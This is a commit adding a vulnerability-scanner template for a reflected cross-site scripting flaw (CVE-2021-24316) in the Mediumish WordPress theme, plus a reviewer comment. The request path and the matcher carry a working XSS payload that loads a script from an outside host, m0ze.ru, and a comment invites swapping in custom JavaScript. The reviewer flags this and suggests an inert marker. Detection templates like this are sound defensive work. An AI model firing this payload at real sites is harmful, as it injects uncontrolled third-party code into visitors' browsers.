Create CVE-2021-24316.yaml
parent
fcbe41f23d
commit
2171f7ec21
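--- a/CVE-2021-24316.yaml
+++ b/CVE-2021-24316.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-24316
+
+info:
+author: 0x_Akoko
+description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+severity: medium
+tags: Mediumish,xss,wordpress
+reference: |
+- https://vulmon.com/vulnerabilitydetails?qid=CVE-2021-24316
+
+requests:
+- method: GET
+path:
+## you can edit this js file with your custom js. //m0ze.ru/payload/a2r.js decode it (base64) with your own.
+- '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E'
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "<script src=https://m0ze.ru/payload/a2r.js></script>"
+part: body
+
+- type: word
+words:
+- "text/html"
+part: header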
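Review bot: The probe in the `path` entry and the body `words` matcher both embed a live third-party script URL (`https://m0ze.ru/payload/a2r.js`), so a vulnerable target reflects a tag that loads code the scanning team does not control into any browser or report viewer that renders the response. A detection template only has to show that the `s` parameter is reflected unescaped, so an inert unique marker is enough: for example `- "<script>alert(document.domain)</script>"` in the matcher with the same string URL-encoded in the request, and the `##` comment inviting custom JS dropped. Separately, `reference: |` opens a literal block scalar, so the `- https://vulmon.com/...` line is most likely parsed as a plain string rather than a list item; `reference:` without the `|` looks like what was intended. The tags line also lacks the `cve` and year tags that CVE templates usually carry, which would make this check harder to select or exclude by tag.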